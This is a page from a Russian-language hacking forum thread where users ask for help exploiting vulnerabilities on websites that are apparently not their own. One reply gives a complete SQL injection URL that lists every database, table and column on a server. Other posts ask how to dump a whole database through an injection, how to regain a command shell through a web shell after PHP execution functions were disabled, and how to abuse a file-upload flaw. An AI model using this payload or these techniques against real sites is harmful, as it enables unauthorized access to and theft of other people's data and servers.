HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 214 из 296 « Первая < 114164204 210 211 212 213 214 215 216 217 218 224264 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2131  
Старый 11.11.2017, 19:03
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию
Вопрос такой.

Есть иньекция на сайте. Таблицы выдергиваются из базы "А".

На сервере под одним пользователем крутиться 3 базы: А. Б.С.

Как составить запрос, чтобы можно выдернуть таблицы, колонки из базы Б и С?

Так берутся данные из базы А.

Цитата:
sqlmap не советуйте, сервер настроен так, что надо ручками.

Когда я написал этот пост я не остановился. Я стал искать дальше и выяснил, что это можно сделать следующим запросом:

Цитата:
group_concat(table_name+SEPARATOR+0x0b) - выводит список таблиц

FROM%20information_schema.tables%20WHERE%20table_s chema=0x6372%20-- - откуда брать таблицы.

ЗаHEXованная строчка - это название базы данных.

ну и колонки это:

Цитата:
 
Ответить с цитированием

  #2132  
Старый 11.11.2017, 20:55
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
Цитата:
Сообщение от Muracha  
Muracha said:

Вопрос такой.
https://rdot.org/forum/showthread.php?t=60
 
Ответить с цитированием

  #2133  
Старый 11.11.2017, 21:30
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
Цитата:
Сообщение от Muracha  
Muracha said:

Как составить запрос...
Код:
Code:
http://site/shop.php?id=-260+union+select+1,2,3,4,5,(select(@n)from(select(@n:=0x20),(select(null)from(information_schema.columns)where(0x2b)in(@n:=concat(@n,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))and(table_schema!=0x696e666f726d6174696f6e5f736368656d61)))n),7,8,9,10,11,12,13,14-- -
Для ознакомления прочтите
 
Ответить с цитированием

  #2134  
Старый 11.11.2017, 23:10
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от Muracha  
Muracha said:

sqlmap не советуйте, сервер настроен так, что надо ручками.
level и risk выставлял ?
 
Ответить с цитированием

  #2135  
Старый 12.11.2017, 04:16
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию
Цитата:
Сообщение от Sensoft  
Sensoft said:

level
и
risk
выставлял ?
Причем тут лвл и риск ? Говорит же что sqlmap не катит
 
Ответить с цитированием

  #2136  
Старый 13.11.2017, 01:06
garrik
Guest
Сообщений: n/a
Провел на форуме:
961

Репутация: 0
По умолчанию
Господа, такой вопрос: есть инъекция, позволяющая выводить содержимое любой ячейки таблицы в поле формы на веб-странице (после "правильного" POST-запроса). Как можно слить через эту лазейку всю базу ? Структура таблиц базы известна. Есть ли тулза какая-то для этого или нужно самому писать скрипт ?
 
Ответить с цитированием

  #2137  
Старый 13.11.2017, 03:07
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
Цитата:
Сообщение от garrik  
garrik said:

Господа, такой вопрос: есть инъекция, позволяющая выводить содержимое любой ячейки таблицы в поле формы на веб-странице (после "правильного" POST-запроса). Как можно слить через эту лазейку всю базу ? Структура таблиц базы известна. Есть ли тулза какая-то для этого или нужно самому писать скрипт ?
sqlmap
 
Ответить с цитированием

  #2138  
Старый 25.11.2017, 05:01
gena ryzhov
Guest
Сообщений: n/a
Провел на форуме:
4684

Репутация: 0
По умолчанию
Всем доброй ночи!

хочу вернуть доступ к консоли через веб шелл, ранее юзал mail(), а потом mb_send_mail(), их закрыли, уже все функции в доках перерыл, не нашел ничего, open_basedir от корня сайта и /tmp , через бд файлы не читаются

Собственно модули апача и список выключенных функций:

Loaded Apache modules: core, mod_so, http_core, mod_php5, mod_access_compat, mod_actions, mod_alias, mod_auth_basic, mod_authn_core, mod_authn_file, mod_authz_core, mod_authz_groupfile, mod_authz_host, mod_authz_user, mod_autoindex, mod_dir, mod_env, mod_filter, mod_headers, mod_include, mod_log_config, mod_logio, mod_mime, mod_negotiation, mod_remoteip, mod_rewrite, mod_setenvif, mod_status, mod_unixd, mod_userdir, mod_version, prefork, mod_ssl, mod_systemd, mod_cgi

Disabled PHP Functions: exec,system,passthru,shell_exec,popen,show_source, posix_getpwuid,posix_setuid,posix_uname,cmd,escape shellcmd,popen,proc_open,dbmopen,suexec,pcntl_exec ,phpinfo,php_uname,mail,mb_send_mail

Крик души! Если есть какие-нибудь варианты буду рад обсудить!

P.S.

Смотрю в сторону использования CGI , PERL, но ничего не смыслю в этом!
 
Ответить с цитированием

  #2139  
Старый 25.11.2017, 05:59
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию
Цитата:
Сообщение от gena ryzhov  
gena ryzhov said:

Всем доброй ночи!
хочу вернуть доступ к консоли через веб шелл, ранее юзал mail(), а потом mb_send_mail(), их закрыли, уже все функции в доках перерыл, не нашел ничего, open_basedir от корня сайта и /tmp , через бд файлы не читаются
Собственно модули апача и список выключенных функций:
Loaded Apache modules: core, mod_so, http_core, mod_php5, mod_access_compat, mod_actions, mod_alias, mod_auth_basic, mod_authn_core, mod_authn_file, mod_authz_core, mod_authz_groupfile, mod_authz_host, mod_authz_user, mod_autoindex, mod_dir, mod_env, mod_filter, mod_headers, mod_include, mod_log_config, mod_logio, mod_mime, mod_negotiation, mod_remoteip, mod_rewrite, mod_setenvif, mod_status, mod_unixd, mod_userdir, mod_version, prefork, mod_ssl, mod_systemd, mod_cgi
Disabled PHP Functions: exec,system,passthru,shell_exec,popen,show_source, posix_getpwuid,posix_setuid,posix_uname,cmd,escape shellcmd,popen,proc_open,dbmopen,suexec,pcntl_exec ,phpinfo,php_uname,mail,mb_send_mail
Крик души! Если есть какие-нибудь варианты буду рад обсудить!
P.S.
Смотрю в сторону использования CGI , PERL, но ничего не смыслю в этом!
это как будто викторина без конца, по ключевым словам вопрос гуглится очень хорошо, если ты перепробуешь то что уже придумано, и это не работает, то стоит подкорректировать вопрос упомянув что уже было испробовано
 
Ответить с цитированием

  #2140  
Старый 28.11.2017, 12:22
MyNameIsWhoIsWho
Guest
Сообщений: n/a
Провел на форуме:
1219

Репутация: 0
По умолчанию
Ребят подскажите, нашел файл аплоад, но хз как отправить файл пост запросом)

Хтмл формы для заливки нет.

Как мне вообще создать запрос на отправку файла? И чем его отправить?

Знаю что тупой вопрос, но почему то всегда игнорировал эту тему а теперь пришлось столкнуться

Или ткните носом в инфу, полистал форум с гуглом, что-то не нашел
 
Ответить с цитированием
Ответ
Страница 214 из 296 « Первая < 114164204 210 211 212 213 214 215 216 217 218 224264 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ